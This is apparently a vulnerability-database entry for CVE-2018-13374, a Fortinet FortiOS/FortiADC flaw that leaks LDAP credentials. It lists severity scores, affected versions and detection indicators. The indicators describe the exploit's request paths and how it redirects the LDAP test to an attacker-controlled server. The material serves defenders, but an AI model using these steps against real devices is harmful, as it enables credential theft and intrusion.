cbcvebase.
CVE-2018-13374
published 2019-01-22

CVE-2018-13374: A Improper Access Control in Fortinet FortiOS 6.0.2, 5.6.7 and before, FortiADC 6.1.0, 6.0.0 to 6.0.1, 5.4.0 to 5.4.4 allows attacker to obtain the LDAP server…

PriorityP181medium4.3CVSS 3.1
AVNACLPRLUINSUCLINAN
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2022-09-29
Exploited in the wild
EPSS
38.09%
98.4th percentile
A Improper Access Control in Fortinet FortiOS 6.0.2, 5.6.7 and before, FortiADC 6.1.0, 6.0.0 to 6.0.1, 5.4.0 to 5.4.4 allows attacker to obtain the LDAP server login credentials configured in FortiGate via pointing a LDAP server connectivity test request to a rogue LDAP server instead of the configured one.

Affected

8 ranges
VendorProductVersion rangeFixed in
fortinetfortiadc
fortinetfortiadc
fortinetfortiadc>= 5.4.0 < 5.4.55.4.5
fortinetfortiadc>= 6.0.0 < 6.0.26.0.2
fortinetfortigate
fortinetfortinet
fortinetfortios< 6.0.36.0.3
fortinetfortios

Detection & IOCsextracted from sources · hover to see the quote

url/logincheck
url/p/user/ldap/json/
url/api/ldap?json=
  • Monitor for GET requests to the FortiGate endpoint /p/user/ldap/json/ — this path is used by the exploit to enumerate the existing LDAP server configuration (name, username, port, DN, CA cert) prior to triggering the credential theft.
  • Monitor for GET requests to /api/ldap?json= containing a modified 'server' field pointing to an attacker-controlled IP (i.e., the 'server' value differs from the configured LDAP server) and 'secure':0 — this is the direct exploitation step that redirects the LDAP bind to a rogue server.
  • Detect inbound LDAP bind requests (TCP) from the FortiGate management IP to unexpected external hosts — the exploit sets up a rogue LDAP listener on the attacker's IP to capture cleartext credentials sent by FortiGate.
  • CVE-2018-13374 was observed as an initial access vector in Conti ransomware attack chains alongside CVE-2018-13379; correlate FortiGate exploitation attempts with subsequent BazarLoader activity or lateral movement indicators.
  • The exploit requires a valid (even read-only) FortiGate web UI login session before triggering the vulnerability; alert on successful logins to /logincheck from unusual source IPs followed immediately by requests to /p/user/ldap/json/ and /api/ldap.
  • ·The exploit sets 'secure':0 in the crafted LDAP request, meaning it forces an unencrypted LDAP bind. Environments that enforce LDAPS (secure=1 or higher) on all LDAP server objects may reduce the risk of credential interception in transit, but the improper access control flaw (ability to redirect the test to an arbitrary server) still exists in affected versions.
  • ·Affected versions span a wide range: FortiOS 6.0.2, 5.6.7 and below; FortiADC 6.1.0, 6.0.0–6.0.1, 5.4.0–5.4.4. Ensure patching covers all product lines, not just FortiOS/FortiGate.

CVSS provenance

nvdv3.14.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
nvdv2.04.0MEDIUMAV:N/AC:L/Au:S/C:P/I:N/A:N
vulncheck4.3MEDIUM
cisa4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.